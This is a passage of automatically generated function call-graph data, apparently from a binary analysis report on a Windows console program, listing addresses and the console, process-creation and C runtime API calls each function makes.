18594->18595 18596 7ff7ab1360a5 18595->18596 18597 7ff7ab13f5dc 18596->18597 18598 7ff7ab1360b1 18596->18598 18599 7ff7ab123278 166 API calls 18597->18599 18601 7ff7ab1333f0 _vsnwprintf 18598->18601 18600 7ff7ab13f5e8 18599->18600 18602 7ff7ab13f5ee GetLastError 18600->18602 18603 7ff7ab1360d9 18601->18603 18604 7ff7ab13498c 8 API calls 18603->18604 18605 7ff7ab1360e6 18604->18605 18605->18602 18606 7ff7ab1360ee 18605->18606 18607 7ff7ab12ff70 2 API calls 18606->18607 18608 7ff7ab1360f6 18607->18608 18609 7ff7ab138f80 7 API calls 18608->18609 18610 7ff7ab136105 18609->18610 18610->18567 18629 7ff7ab1361c8 18611->18629 18613 7ff7ab1361c8 188 API calls 18614 7ff7ab136154 18613->18614 18614->18613 18615 7ff7ab136b68 printf 18614->18615 18616 7ff7ab136187 18614->18616 18615->18614 18616->18567 18618 7ff7ab133aa4 18617->18618 18619 7ff7ab133b73 18617->18619 18618->18619 18620 7ff7ab1309f4 2 API calls 18618->18620 18619->18586 18621 7ff7ab133ac8 18620->18621 18622 7ff7ab12b900 166 API calls 18621->18622 18623 7ff7ab133ad0 18622->18623 18624 7ff7ab133ad8 wcsrchr 18623->18624 18627 7ff7ab133af4 18623->18627 18624->18627 18625 7ff7ab133b66 18626 7ff7ab12ff70 2 API calls 18625->18626 18626->18619 18627->18625 18628 7ff7ab133b2d _wcsnicmp 18627->18628 18628->18627 18635 7ff7ab136270 18629->18635 18631 7ff7ab13622f 18631->18614 18632 7ff7ab136270 188 API calls 18633 7ff7ab1361fc 18632->18633 18633->18631 18633->18632 18634 7ff7ab136b68 printf 18633->18634 18634->18633 18641 7ff7ab136318 18635->18641 18637 7ff7ab1362d7 18637->18633 18638 7ff7ab136318 188 API calls 18639 7ff7ab1362a4 18638->18639 18639->18637 18639->18638 18640 7ff7ab136b68 printf 18639->18640 18640->18639 18647 7ff7ab136454 18641->18647 18643 7ff7ab136387 18643->18639 18644 7ff7ab136454 188 API calls 18645 7ff7ab13634c 18644->18645 18645->18643 18645->18644 18646 7ff7ab136b68 printf 18645->18646 18646->18645 18653 7ff7ab13653c 18647->18653 18649 7ff7ab1364bf 18649->18645 18650 7ff7ab13653c 188 API calls 18651 7ff7ab136488 18650->18651 18651->18649 18651->18650 18652 7ff7ab136b68 printf 18651->18652 18652->18651 18654 7ff7ab13662c 188 API calls 18653->18654 18657 7ff7ab136570 18654->18657 18655 7ff7ab1365af 18655->18651 18656 7ff7ab13662c 188 API calls 18656->18657 18657->18655 18657->18656 18658 7ff7ab136b68 printf 18657->18658 18658->18657 18660 7ff7ab1333b8 18659->18660 18661 7ff7ab1333bd iswspace 18660->18661 18662 7ff7ab1333d0 18660->18662 18661->18660 18661->18662 18662->18510 18662->18512 18662->18538 16779 7ff7ab138d80 16780 7ff7ab138da4 16779->16780 16781 7ff7ab138db6 16780->16781 16782 7ff7ab138dbf Sleep 16780->16782 16783 7ff7ab138ddb _amsg_exit 16781->16783 16785 7ff7ab138de7 16781->16785 16782->16780 16783->16785 16784 7ff7ab138e56 _initterm 16786 7ff7ab138e73 _IsNonwritableInCurrentImage 16784->16786 16785->16784 16785->16786 16791 7ff7ab138e3c 16785->16791 16793 7ff7ab1337d8 GetCurrentThreadId OpenThread 16786->16793 16826 7ff7ab1304f4 16793->16826 16795 7ff7ab133839 HeapSetInformation RegOpenKeyExW 16796 7ff7ab13e9f8 RegQueryValueExW RegCloseKey 16795->16796 16797 7ff7ab13388d 16795->16797 16799 7ff7ab13ea41 GetThreadLocale 16796->16799 16798 7ff7ab135920 VirtualQuery VirtualQuery 16797->16798 16800 7ff7ab1338ab GetConsoleOutputCP GetCPInfo 16798->16800 16808 7ff7ab133919 16799->16808 16800->16799 16801 7ff7ab1338f1 memset 16800->16801 16801->16808 16802 7ff7ab134d5c 391 API calls 16802->16808 16803 7ff7ab123240 166 API calls 16803->16808 16804 7ff7ab13eb27 _setjmp 16804->16808 16805 7ff7ab133948 _setjmp 16805->16808 16806 7ff7ab148530 370 API calls 16806->16808 16807 7ff7ab1301b8 6 API calls 16807->16808 16808->16796 16808->16802 16808->16803 16808->16804 16808->16805 16808->16806 16808->16807 16809 7ff7ab134c1c 166 API calls 16808->16809 16810 7ff7ab12df60 481 API calls 16808->16810 16811 7ff7ab13eb71 _setmode 16808->16811 16812 7ff7ab1386f0 182 API calls 16808->16812 16813 7ff7ab130580 12 API calls 16808->16813 16815 7ff7ab1358e4 EnterCriticalSection LeaveCriticalSection 16808->16815 16817 7ff7ab12be00 647 API calls 16808->16817 16818 7ff7ab1358e4 EnterCriticalSection LeaveCriticalSection 16808->16818 16809->16808 16810->16808 16811->16808 16812->16808 16814 7ff7ab13398b GetConsoleOutputCP GetCPInfo 16813->16814 16816 7ff7ab1304f4 GetModuleHandleW GetProcAddress SetThreadLocale 16814->16816 16815->16808 16816->16808 16817->16808 16819 7ff7ab13ebbe GetConsoleOutputCP GetCPInfo 16818->16819 16820 7ff7ab1304f4 GetModuleHandleW GetProcAddress SetThreadLocale 16819->16820 16821 7ff7ab13ebe6 16820->16821 16822 7ff7ab12be00 647 API calls 16821->16822 16823 7ff7ab130580 12 API calls 16821->16823 16822->16821 16824 7ff7ab13ebfc GetConsoleOutputCP GetCPInfo 16823->16824 16825 7ff7ab1304f4 GetModuleHandleW GetProcAddress SetThreadLocale 16824->16825 16825->16808 16827 7ff7ab130504 16826->16827 16828 7ff7ab13051e GetModuleHandleW 16827->16828 16829 7ff7ab13054d GetProcAddress 16827->16829 16830 7ff7ab13056c SetThreadLocale 16827->16830 16828->16827 16829->16827 22025 7ff7ab12b8c0 22028 7ff7ab12be00 22025->22028 22029 7ff7ab12b8d4 22028->22029 22030 7ff7ab12be1b 22028->22030 22030->22029 22031 7ff7ab12be47 memset 22030->22031 22032 7ff7ab12be67 22030->22032 22134 7ff7ab12bff0 22031->22134 22033 7ff7ab12be73 22032->22033 22036 7ff7ab12bf29 22032->22036 22037 7ff7ab12beaf 22032->22037 22035 7ff7ab12be92 22033->22035 22039 7ff7ab12bf0c 22033->22039 22045 7ff7ab12bea1 22035->22045 22062 7ff7ab12c620 GetConsoleTitleW 22035->22062 22038 7ff7ab12cd90 166 API calls 22036->22038 22037->22029 22043 7ff7ab12bff0 185 API calls 22037->22043 22041 7ff7ab12bf33 22038->22041 22172 7ff7ab12b0d8 memset 22039->22172 22041->22037 22046 7ff7ab12bf70 22041->22046 22047 7ff7ab1288a8 _wcsicmp 22041->22047 22043->22029 22045->22037 22051 7ff7ab12af98 2 API calls 22045->22051 22058 7ff7ab12bf75 22046->22058 22232 7ff7ab1271ec 22046->22232 22050 7ff7ab12bf5a 22047->22050 22048 7ff7ab12bf1e 22048->22037 22050->22046 22053 7ff7ab130a6c 273 API calls 22050->22053 22051->22037 22052 7ff7ab12bfa9 22052->22037 22054 7ff7ab12cd90 166 API calls 22052->22054 22053->22046 22055 7ff7ab12bfbb 22054->22055 22055->22037 22056 7ff7ab13081c 166 API calls 22055->22056 22056->22058 22057 7ff7ab12b0d8 194 API calls 22059 7ff7ab12bf7f 22057->22059 22058->22057 22059->22037 22105 7ff7ab135ad8 22059->22105 22064 7ff7ab12c675 22062->22064 22068 7ff7ab12ca2f 22062->22068 22063 7ff7ab13c5fc GetLastError 22063->22068 22065 7ff7ab12ca40 17 API calls 22064->22065 22074 7ff7ab12c69b 22065->22074 22066 7ff7ab123278 166 API calls 22066->22068 22067 7ff7ab13855c ??_V@YAXPEAX 22067->22068 22068->22063 22068->22066 22068->22067 22069 7ff7ab12c9b5 22073 7ff7ab13855c ??_V@YAXPEAX 22069->22073 22070 7ff7ab1289c0 23 API calls 22093 7ff7ab12c762 22070->22093 22071 7ff7ab12c978 towupper 22071->22093 22072 7ff7ab13855c ??_V@YAXPEAX 22072->22093 22094 7ff7ab12c855 22073->22094 22074->22068 22074->22069 22076 7ff7ab12d3f0 223 API calls 22074->22076 22074->22093 22075 7ff7ab13c60e 22078 7ff7ab14ec14 173 API calls 22075->22078 22079 7ff7ab12c741 22076->22079 22077 7ff7ab12c872 22082 7ff7ab13855c ??_V@YAXPEAX 22077->22082 22078->22093 22081 7ff7ab12c74d 22079->22081 22084 7ff7ab12c8b5 wcsncmp 22079->22084 22080 7ff7ab13c6b8 SetConsoleTitleW 22080->22077 22085 7ff7ab12bd38 207 API calls 22081->22085 22081->22093 22083 7ff7ab12c87c 22082->22083 22086 7ff7ab138f80 7 API calls 22083->22086 22084->22081 22084->22093 22085->22093 22088 7ff7ab12c88e 22086->22088 22087 7ff7ab12c83d 22238 7ff7ab12cb40 22087->22238 22088->22045 22090 7ff7ab12c78a wcschr 22090->22093 22092 7ff7ab13291c 8 API calls 22092->22093 22093->22063 22093->22068 22093->22069 22093->22070 22093->22071 22093->22072 22093->22075 22093->22087 22093->22090 22093->22092 22095 7ff7ab12ca25 22093->22095 22097 7ff7ab13c684 22093->22097 22100 7ff7ab12ca2a 22093->22100 22102 7ff7ab12ca16 GetLastError 22093->22102 22094->22077 22094->22080 22098 7ff7ab123278 166 API calls 22095->22098 22099 7ff7ab123278 166 API calls 22097->22099 22098->22068 22099->22068 22101 7ff7ab139158 7 API calls 22100->22101 22101->22068 22104 7ff7ab123278 166 API calls 22102->22104 22104->22068 22106 7ff7ab12cd90 166 API calls 22105->22106 22107 7ff7ab135b12 22106->22107 22108 7ff7ab12cb40 166 API calls 22107->22108 22132 7ff7ab135b8b 22107->22132 22109 7ff7ab135b26 22108->22109 22112 7ff7ab130a6c 273 API calls 22109->22112 22109->22132 22110 7ff7ab138f80 7 API calls 22111 7ff7ab12bf99 22110->22111 22111->22045 22113 7ff7ab135b43 22112->22113 22114 7ff7ab135bb8 22113->22114 22115 7ff7ab135b48 GetConsoleTitleW 22113->22115 22116 7ff7ab135bbd GetConsoleTitleW 22114->22116 22117 7ff7ab135bf4 22114->22117 22118 7ff7ab12cad4 172 API calls 22115->22118 22119 7ff7ab12cad4 172 API calls 22116->22119 22120 7ff7ab135bfd 22117->22120 22121 7ff7ab13f452 22117->22121 22122 7ff7ab135b66 22118->22122 22123 7ff7ab135bdb 22119->22123 22127 7ff7ab135c1b 22120->22127 22128 7ff7ab13f462 22120->22128 22120->22132 22125 7ff7ab133c24 166 API calls 22121->22125 22254 7ff7ab134224 InitializeProcThreadAttributeList 22122->22254 22314 7ff7ab1296e8 22123->22314 22125->22132 22130 7ff7ab123278 166 API calls 22127->22130 22131 7ff7ab123278 166 API calls 22128->22131 22129 7ff7ab135b7f 22133 7ff7ab135c3c SetConsoleTitleW 22129->22133 22130->22132 22131->22132 22132->22110 22133->22132 22135 7ff7ab12c0c4 22134->22135 22136 7ff7ab12c01c 22134->22136 22135->22032 22137 7ff7ab12c022 22136->22137 22138 7ff7ab12c086 22136->22138 22139 7ff7ab12c030 22137->22139 22140 7ff7ab12c113 22137->22140 22142 7ff7ab12c144 22138->22142 22153 7ff7ab12c094 22138->22153 22141 7ff7ab12c039 wcschr 22139->22141 22155 7ff7ab12c053 22139->22155 22151 7ff7ab12ff70 2 API calls 22140->22151 22140->22155 22144 7ff7ab12c301 22141->22144 22141->22155 22143 7ff7ab12c151 22142->22143 22161 7ff7ab12c1c8 22142->22161 22520 7ff7ab12c460 22143->22520 22150 7ff7ab12cd90 166 API calls 22144->22150 22145 7ff7ab12c058 22156 7ff7ab12ff70 2 API calls 22145->22156 22159 7ff7ab12c073 22145->22159 22146 7ff7ab12c0c6 22149 7ff7ab12c0cf wcschr 22146->22149 22146->22159 22148 7ff7ab12c460 183 API calls 22148->22153 22154 7ff7ab12c1be 22149->22154 22149->22159 22171 7ff7ab12c30b 22150->22171 22151->22155 22153->22135 22153->22148 22157 7ff7ab12cd90 166 API calls 22154->22157 22155->22145 22155->22146 22163 7ff7ab12c211 22155->22163 22156->22159 22157->22161 22158 7ff7ab12c460 183 API calls 22158->22135 22159->22135 22160 7ff7ab12c460 183 API calls 22159->22160 22160->22159 22161->22135 22162 7ff7ab12c285 22161->22162 22161->22163 22168 7ff7ab12d840 178 API calls 22161->22168 22162->22163 22167 7ff7ab12b6b0 170 API calls 22162->22167 22166 7ff7ab12ff70 2 API calls 22163->22166 22164 7ff7ab12b6b0 170 API calls 22164->22155 22165 7ff7ab12d840 178 API calls 22165->22171 22166->22135 22169 7ff7ab12c2ac 22167->22169 22168->22161 22169->22159 22169->22163 22170 7ff7ab12c3d4 22170->22159 22170->22163 22170->22164 22171->22135 22171->22163 22171->22165 22171->22170 22173 7ff7ab12ca40 17 API calls 22172->22173 22189 7ff7ab12b162 22173->22189 22174 7ff7ab12b2e1 22176 7ff7ab12b2f7 ??_V@YAXPEAX 22174->22176 22177 7ff7ab12b303 22174->22177 22175 7ff7ab12b1d9 22180 7ff7ab12cd90 166 API calls 22175->22180 22197 7ff7ab12b1ed 22175->22197 22176->22177 22179 7ff7ab138f80 7 API calls 22177->22179 22178 7ff7ab131ea0 8 API calls 22178->22189 22181 7ff7ab12b315 22179->22181 22180->22197 22181->22035 22181->22048 22183 7ff7ab12b228 _get_osfhandle 22185 7ff7ab12b23f _get_osfhandle 22183->22185 22183->22197 22184 7ff7ab13bfef _get_osfhandle SetFilePointer 22186 7ff7ab13c01d 22184->22186 22184->22197 22185->22197 22188 7ff7ab1333f0 _vsnwprintf 22186->22188 22191 7ff7ab13c038 22188->22191 22189->22174 22189->22175 22189->22178 22189->22189 22190 7ff7ab1301b8 6 API calls 22190->22197 22196 7ff7ab123278 166 API calls 22191->22196 22192 7ff7ab13c1c3 22193 7ff7ab1333f0 _vsnwprintf 22192->22193 22193->22191 22194 7ff7ab12d208 _close 22194->22197 22195 7ff7ab1326e0 19 API calls 22195->22197 22199 7ff7ab13c1f9 22196->22199 22197->22174 22197->22183 22197->22184 22197->22190 22197->22192 22197->22194 22197->22195 22198 7ff7ab13c060 22197->22198 22200 7ff7ab13c246 22197->22200 22202 7ff7ab12b038 _dup2 22197->22202 22207 7ff7ab12b356 22197->22207 22231 7ff7ab13c1a5 22197->22231 22534 7ff7ab12affc _dup 22197->22534 22536 7ff7ab14f318 _get_osfhandle GetFileType 22197->22536 22198->22200 22203 7ff7ab1309f4 2 API calls 22198->22203 22201 7ff7ab12af98 2 API calls 22199->22201 22204 7ff7ab12af98 2 API calls 22200->22204 22201->22174 22202->22197 22208 7ff7ab13c084 22203->22208 22209 7ff7ab13c24b 22204->22209 22205 7ff7ab12b038 _dup2 22206 7ff7ab13c1b7 22205->22206 22210 7ff7ab13c207 22206->22210 22211 7ff7ab13c1be 22206->22211 22214 7ff7ab12af98 2 API calls 22207->22214 22212 7ff7ab12b900 166 API calls 22208->22212 22213 7ff7ab14f1d8 166 API calls 22209->22213 22217 7ff7ab12d208 _close 22210->22217 22215 7ff7ab12d208 _close 22211->22215 22216 7ff7ab13c08c 22212->22216 22213->22174 22218 7ff7ab13c211 22214->22218 22215->22192 22219 7ff7ab13c094 wcsrchr 22216->22219 22223 7ff7ab13c0ad 22216->22223 22217->22207 22220 7ff7ab1333f0 _vsnwprintf 22218->22220 22219->22223 22221 7ff7ab13c22c 22220->22221 22222 7ff7ab123278 166 API calls 22221->22222 22222->22174 22223->22223 22225 7ff7ab13c0e0 _wcsnicmp 22223->22225 22227 7ff7ab13c106 22223->22227 22224 7ff7ab12ff70 2 API calls 22226 7ff7ab13c13b 22224->22226 22225->22223 22226->22200 22228 7ff7ab13c146 SearchPathW 22226->22228 22227->22224 22228->22200 22229 7ff7ab13c188 22228->22229 22230 7ff7ab1326e0 19 API calls 22229->22230 22230->22231 22231->22205 22233 7ff7ab127279 22232->22233 22234 7ff7ab127211 _setjmp 22232->22234 22233->22052 22234->22233 22236 7ff7ab127265 22234->22236 22537 7ff7ab1272b0 22236->22537 22239 7ff7ab12cb63 22238->22239 22240 7ff7ab12cd90 166 API calls 22239->22240 22241 7ff7ab12c848 22240->22241 22241->22094 22242 7ff7ab12cad4 22241->22242 22243 7ff7ab12cb05 22242->22243 22244 7ff7ab12cad9 22242->22244 22243->22094 22244->22243 22245 7ff7ab12cd90 166 API calls 22244->22245 22246 7ff7ab13c722 22245->22246 22246->22243 22247 7ff7ab13c72e GetConsoleTitleW 22246->22247 22247->22243 22248 7ff7ab13c74a 22247->22248 22249 7ff7ab12b6b0 170 API calls 22248->22249 22253 7ff7ab13c778 22249->22253 22250 7ff7ab13c7ec 22251 7ff7ab12ff70 2 API calls 22250->22251 22251->22243 22252 7ff7ab13c7dd SetConsoleTitleW 22252->22250 22253->22250 22253->22252 22255 7ff7ab1342ab UpdateProcThreadAttribute 22254->22255 22256 7ff7ab13ecd4 GetLastError 22254->22256 22258 7ff7ab1342eb memset memset GetStartupInfoW 22255->22258 22259 7ff7ab13ecf0 GetLastError 22255->22259 22257 7ff7ab13ecee 22256->22257 22261 7ff7ab133a90 170 API calls 22258->22261 22351 7ff7ab149eec 22259->22351 22263 7ff7ab1343a8 22261->22263 22264 7ff7ab12b900 166 API calls 22263->22264 22265 7ff7ab1343bb 22264->22265 22266 7ff7ab134638 _local_unwind 22265->22266 22267 7ff7ab1343cc 22265->22267 22266->22267 22268 7ff7ab1343de wcsrchr 22267->22268 22269 7ff7ab134415 22267->22269 22268->22269 22271 7ff7ab1343f7 lstrcmpW 22268->22271 22338 7ff7ab135a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22269->22338 22271->22269 22273 7ff7ab134668 22271->22273 22272 7ff7ab13441a 22274 7ff7ab13442a CreateProcessW 22272->22274 22277 7ff7ab134596 CreateProcessAsUserW 22272->22277 22339 7ff7ab149044 22273->22339 22276 7ff7ab13448b 22274->22276 22278 7ff7ab134672 GetLastError 22276->22278 22279 7ff7ab134495 CloseHandle 22276->22279 22277->22276 22287 7ff7ab13468d 22278->22287 22280 7ff7ab13498c 8 API calls 22279->22280 22281 7ff7ab1344c5 22280->22281 22286 7ff7ab1344cd 22281->22286 22281->22287 22282 7ff7ab1347a3 22282->22129 22283 7ff7ab1344f8 22283->22282 22285 7ff7ab134612 22283->22285 22289 7ff7ab135cb4 7 API calls 22283->22289 22284 7ff7ab12cd90 166 API calls 22288 7ff7ab134724 22284->22288 22290 7ff7ab13461c 22285->22290 22292 7ff7ab1347e1 CloseHandle 22285->22292 22286->22282 22286->22283 22302 7ff7ab14a250 33 API calls 22286->22302 22287->22284 22287->22286 22291 7ff7ab13472c _local_unwind 22288->22291 22298 7ff7ab13473d 22288->22298 22293 7ff7ab134517 22289->22293 22294 7ff7ab12ff70 GetProcessHeap RtlFreeHeap 22290->22294 22291->22298 22292->22290 22295 7ff7ab1333f0 _vsnwprintf 22293->22295 22296 7ff7ab1347fa DeleteProcThreadAttributeList 22294->22296 22297 7ff7ab134544 22295->22297 22299 7ff7ab138f80 7 API calls 22296->22299 22300 7ff7ab13498c 8 API calls 22297->22300 22306 7ff7ab12ff70 GetProcessHeap RtlFreeHeap 22298->22306 22303 7ff7ab134820 22299->22303 22301 7ff7ab134558 22300->22301 22304 7ff7ab1347ae 22301->22304 22305 7ff7ab134564 22301->22305 22302->22283 22303->22129 22308 7ff7ab1333f0 _vsnwprintf 22304->22308 22307 7ff7ab13498c 8 API calls 22305->22307 22309 7ff7ab13475b _local_unwind 22306->22309 22310 7ff7ab134577 22307->22310 22308->22285 22309->22286 22310->22290 22311 7ff7ab13457f 22310->22311 22312 7ff7ab14a920 210 API calls 22311->22312 22313 7ff7ab134584 22312->22313 22313->22290 22318 7ff7ab129737 22314->22318 22316 7ff7ab12977d memset 22319 7ff7ab12ca40 17 API calls 22316->22319 22317 7ff7ab12cd90 166 API calls 22317->22318 22318->22316 22318->22317 22320 7ff7ab13b76e 22318->22320 22321 7ff7ab13b7b3 22318->22321 22323 7ff7ab12b364 17 API calls 22318->22323 22330 7ff7ab13b79a 22318->22330 22332 7ff7ab12986d 22318->22332 22333 7ff7ab1296b4 186 API calls 22318->22333 22353 7ff7ab131fac memset 22318->22353 22380 7ff7ab12ce10 22318->22380 22430 7ff7ab135920 22318->22430 22319->22318 22322 7ff7ab123278 166 API calls 22320->22322 22325 7ff7ab13b787 22322->22325 22323->22318 22324 7ff7ab13855c ??_V@YAXPEAX 22324->22321 22326 7ff7ab13b795 22325->22326 22328 7ff7ab14e944 393 API calls 22325->22328 22436 7ff7ab147694 22326->22436 22328->22326 22330->22324 22334 7ff7ab12988c 22332->22334 22335 7ff7ab129880 ??_V@YAXPEAX 22332->22335 22333->22318 22336 7ff7ab138f80 7 API calls 22334->22336 22335->22334 22337 7ff7ab12989d 22336->22337 22337->22129 22340 7ff7ab133a90 170 API calls 22339->22340 22341 7ff7ab149064 22340->22341 22342 7ff7ab14906e 22341->22342 22343 7ff7ab149083 22341->22343 22344 7ff7ab13498c 8 API calls 22342->22344 22346 7ff7ab12cd90 166 API calls 22343->22346 22345 7ff7ab149081 22344->22345 22345->22269 22347 7ff7ab14909b 22346->22347 22347->22345 22348 7ff7ab13498c 8 API calls 22347->22348 22349 7ff7ab1490ec 22348->22349 22350 7ff7ab12ff70 2 API calls 22349->22350 22350->22345 22352 7ff7ab13ed0a DeleteProcThreadAttributeList 22351->22352 22352->22257 22354 7ff7ab13203b 22353->22354 22355 7ff7ab1320b0 22354->22355 22356 7ff7ab132094 22354->22356 22357 7ff7ab133060 171 API calls 22355->22357 22359 7ff7ab13211c 22355->22359 22358 7ff7ab1320a6 22356->22358 22360 7ff7ab123278 166 API calls 22356->22360 22357->22359 22361 7ff7ab138f80 7 API calls 22358->22361 22359->22358 22362 7ff7ab132e44 2 API calls 22359->22362 22360->22358 22363 7ff7ab132325 22361->22363 22364 7ff7ab132148 22362->22364 22363->22318 22364->22358 22365 7ff7ab132d70 3 API calls 22364->22365 22366 7ff7ab1321af 22365->22366 22367 7ff7ab12b900 166 API calls 22366->22367 22369 7ff7ab1321d0 22367->22369 22368 7ff7ab13e04a ??_V@YAXPEAX 22368->22358 22369->22368 22370 7ff7ab13221c wcsspn 22369->22370 22379 7ff7ab1322a4 ??_V@YAXPEAX 22369->22379 22372 7ff7ab12b900 166 API calls 22370->22372 22373 7ff7ab13223b 22372->22373 22373->22368 22376 7ff7ab132252 22373->22376 22374 7ff7ab12d3f0 223 API calls 22374->22379 22375 7ff7ab13e06d wcschr 22375->22376 22376->22375 22377 7ff7ab13e090 towupper 22376->22377 22378 7ff7ab13228f 22376->22378 22377->22376 22377->22378 22378->22374 22379->22358 22418 7ff7ab12d0f8 22380->22418 22424 7ff7ab12ce5b 22380->22424 22381 7ff7ab138f80 7 API calls 22383 7ff7ab12d10a 22381->22383 22382 7ff7ab13c860 22384 7ff7ab13c97c 22382->22384 22385 7ff7ab14ee88 390 API calls 22382->22385 22383->22318 22386 7ff7ab14e9b4 197 API calls 22384->22386 22388 7ff7ab13c879 22385->22388 22389 7ff7ab13c981 longjmp 22386->22389 22387 7ff7ab130494 182 API calls 22387->22424 22390 7ff7ab13c95c 22388->22390 22391 7ff7ab13c882 EnterCriticalSection LeaveCriticalSection 22388->22391 22392 7ff7ab13c99a 22389->22392 22390->22384 22397 7ff7ab1296b4 186 API calls 22390->22397 22396 7ff7ab12d0e3 22391->22396 22393 7ff7ab13c9b3 ??_V@YAXPEAX 22392->22393 22392->22418 22393->22418 22395 7ff7ab12ceaa _tell 22398 7ff7ab12d208 _close 22395->22398 22396->22318 22397->22390 22398->22424 22399 7ff7ab12cd90 166 API calls 22399->22424 22400 7ff7ab13c9d5 22401 7ff7ab14d610 167 API calls 22400->22401 22403 7ff7ab13c9da 22401->22403 22402 7ff7ab12b900 166 API calls 22402->22424 22404 7ff7ab13ca07 22403->22404 22406 7ff7ab14bfec 176 API calls 22403->22406 22405 7ff7ab14e91c 198 API calls 22404->22405 22410 7ff7ab13ca0c 22405->22410 22407 7ff7ab13c9f1 22406->22407 22409 7ff7ab123240 166 API calls 22407->22409 22408 7ff7ab12cf33 memset 22408->22424 22409->22404 22410->22318 22411 7ff7ab12ca40 17 API calls 22411->22424 22412 7ff7ab12d184 wcschr 22412->22424 22413 7ff7ab14bfec 176 API calls 22413->22424 22414 7ff7ab13c9c9 22416 7ff7ab13855c ??_V@YAXPEAX 22414->22416 22415 7ff7ab12d1a7 wcschr 22415->22424 22416->22418 22417 7ff7ab14778c 166 API calls 22417->22424 22418->22381 22419 7ff7ab130a6c 273 API calls 22419->22424 22420 7ff7ab12be00 635 API calls 22420->22424 22421 7ff7ab133448 166 API calls 22421->22424 22422 7ff7ab12cfab _wcsicmp 22422->22424 22423 7ff7ab130580 12 API calls 22425 7ff7ab12d003 GetConsoleOutputCP GetCPInfo 22423->22425 22424->22382 22424->22387 22424->22392 22424->22396 22424->22399 22424->22400 22424->22402 22424->22408 22424->22411 22424->22412 22424->22413 22424->22414 22424->22415 22424->22417 22424->22418 22424->22419 22424->22420 22424->22421 22424->22422 22424->22423 22428 7ff7ab131fac 238 API calls 22424->22428 22429 7ff7ab12d044 ??_V@YAXPEAX 22424->22429 22442 7ff7ab12df60 22424->22442 22462 7ff7ab14c738 22424->22462 22426 7ff7ab1304f4 3 API calls 22425->22426 22426->22424 22428->22424 22429->22424 22431 7ff7ab13596c 22430->22431 22435 7ff7ab135a12 22430->22435 22432 7ff7ab13598d VirtualQuery 22431->22432 22431->22435 22433 7ff7ab1359ad 22432->22433 22432->22435 22434 7ff7ab1359b7 VirtualQuery 22433->22434 22433->22435 22434->22433 22434->22435 22435->22318 22441 7ff7ab1476a3 22436->22441 22437 7ff7ab1476b7 22438 7ff7ab14e9b4 197 API calls 22437->22438 22440 7ff7ab1476bc longjmp 22438->22440 22439 7ff7ab1296b4 186 API calls 22439->22441 22441->22437 22441->22439 22443 7ff7ab12df93 22442->22443 22445 7ff7ab12dfe2 22442->22445 22444 7ff7ab12df9f GetProcessHeap RtlFreeHeap 22443->22444 22443->22445 22444->22443 22444->22445 22446 7ff7ab12e100 VirtualFree 22445->22446 22447 7ff7ab12e00b _setjmp 22445->22447 22446->22445 22448 7ff7ab12e04a 22447->22448 22449 7ff7ab12e0c3 22447->22449 22450 7ff7ab12e600 473 API calls 22448->22450 22449->22395 22451 7ff7ab12e073 22450->22451 22452 7ff7ab12e081 22451->22452 22453 7ff7ab12e0e0 longjmp 22451->22453 22455 7ff7ab12d250 475 API calls 22452->22455 22454 7ff7ab12e0b0 22453->22454 22454->22449 22472 7ff7ab14d3fc 22454->22472 22456 7ff7ab12e086 22455->22456 22456->22454 22459 7ff7ab12e600 473 API calls 22456->22459 22460 7ff7ab12e0a7 22459->22460 22460->22454 22461 7ff7ab14d610 167 API calls 22460->22461 22461->22454 22463 7ff7ab14c775 22462->22463 22470 7ff7ab14c7ab 22462->22470 22464 7ff7ab12cd90 166 API calls 22463->22464 22466 7ff7ab14c781 22464->22466 22465 7ff7ab14c8d4 22465->22424 22466->22465 22467 7ff7ab12b0d8 194 API calls 22466->22467 22467->22465 22468 7ff7ab12b6b0 170 API calls 22468->22470 22469 7ff7ab12b038 _dup2 22469->22470 22470->22465 22470->22466 22470->22468 22470->22469 22471 7ff7ab12d208 _close 22470->22471 22471->22470 22483 7ff7ab14d419 22472->22483 22473 7ff7ab13cadf 22474 7ff7ab133448 166 API calls 22474->22483 22475 7ff7ab14d592 22476 7ff7ab133448 166 API calls 22475->22476 22480 7ff7ab14d5a5 22476->22480 22477 7ff7ab14d5c4 22478 7ff7ab133448 166 API calls 22477->22478 22478->22473 22482 7ff7ab14d5ba 22480->22482 22486 7ff7ab133448 166 API calls 22480->22486 22481 7ff7ab14d546 22481->22477 22484 7ff7ab14d555 22481->22484 22490 7ff7ab14d36c 22482->22490 22483->22473 22483->22474 22483->22475 22483->22477 22483->22484 22485 7ff7ab14d541 22483->22485 22488 7ff7ab14d3fc 166 API calls 22483->22488 22497 7ff7ab14d31c 22484->22497 22485->22475 22485->22477 22485->22481 22489 7ff7ab14d589 22485->22489 22486->22482 22488->22483 22489->22475 22489->22484 22491 7ff7ab14d3d8 22490->22491 22492 7ff7ab14d381 22490->22492 22493 7ff7ab1334a0 166 API calls 22492->22493 22495 7ff7ab14d390 22493->22495 22494 7ff7ab133448 166 API calls 22494->22495 22495->22491 22495->22494 22496 7ff7ab1334a0 166 API calls 22495->22496 22496->22495 22498 7ff7ab133448 166 API calls 22497->22498 22499 7ff7ab14d33b 22498->22499 22500 7ff7ab14d36c 166 API calls 22499->22500 22501 7ff7ab14d343 22500->22501 22502 7ff7ab14d3fc 166 API calls 22501->22502 22519 7ff7ab14d34e 22502->22519 22503 7ff7ab14d5c2 22503->22473 22504 7ff7ab14d592 22505 7ff7ab133448 166 API calls 22504->22505 22509 7ff7ab14d5a5 22505->22509 22506 7ff7ab14d5c4 22507 7ff7ab133448 166 API calls 22506->22507 22507->22503 22508 7ff7ab14d31c 166 API calls 22508->22503 22511 7ff7ab14d5ba 22509->22511 22514 7ff7ab133448 166 API calls 22509->22514 22510 7ff7ab14d546 22510->22506 22512 7ff7ab14d555 22510->22512 22515 7ff7ab14d36c 166 API calls 22511->22515 22512->22508 22513 7ff7ab14d541 22513->22504 22513->22506 22513->22510 22517 7ff7ab14d589 22513->22517 22514->22511 22515->22503 22516 7ff7ab14d3fc 166 API calls 22516->22519 22517->22504 22517->22512 22518 7ff7ab133448 166 API calls 22518->22519 22519->22503 22519->22504 22519->22506 22519->22512 22519->22513 22519->22516 22519->22518 22521 7ff7ab12c4c9 22520->22521 22522 7ff7ab12c486 22520->22522 22525 7ff7ab12ff70 2 API calls 22521->22525 22527 7ff7ab12c161 22521->22527 22523 7ff7ab12c48e wcschr 22522->22523 22522->22527 22524 7ff7ab12c4ef 22523->22524 22523->22527 22526 7ff7ab12cd90 166 API calls 22524->22526 22525->22527 22533 7ff7ab12c4f9 22526->22533 